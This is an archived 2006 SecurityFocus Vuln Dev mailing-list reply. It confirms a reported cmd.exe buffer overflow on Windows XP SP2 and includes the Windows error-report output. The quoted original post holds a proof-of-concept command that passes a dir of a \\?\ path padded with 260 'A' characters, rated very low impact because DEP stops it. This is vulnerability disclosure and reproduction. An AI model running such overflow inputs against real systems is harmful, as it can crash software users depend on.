Vuln Dev
Re: Windows Command Processor CMD.EXE Buffer Overflow Oct 23 2006 04:35PM
Bernardo Wernesback (bernardosw gmail com)
Reproduced the problem on Windows XP SP2 + All Patches English Version.

EventType : BEX P1 : cmd.exe P2 : 5.1.2600.2180 P3 : 41107ebe
P4 : unknown P5 : 0.0.0.0 P6 : 00000000 P7 : 00410041
P8 : c0000005 P9 : 00000008

DEP went into action and generated a dump to be sent to Microsoft for cmd.exe.

On 10/19/06, gregory_panakkal <gregory_panakkal (at) fastmail (dot) fm [email concealed]> wrote:
>
> Windows Command Processor CMD.EXE Buffer Overflow
> Tested on WinXP SP2
> Impact - Very Low
>
>
> Copy-paste the following line in cmd.exe and execute it..
> (it is a single command, has been split into multiple lines for
> readability sake).
>
> %COMSPEC% /K "dir
> \\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
>
> (260 characters of 'A's)
>
> DEP Comes into the picture.
>
> URL :
> http://www.infogreg.com/security/misc/windows-command-processor-cmd.exe-
buffer-overflow.html
>
> regards,
> Gregory Panakkal
> www.infogreg.com
> --
> gregory_panakkal
> gregory_panakkal (at) fastmail (dot) fm [email concealed]
>
> --
> http://www.fastmail.fm - I mean, what is it about a decent email service?
>
>

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus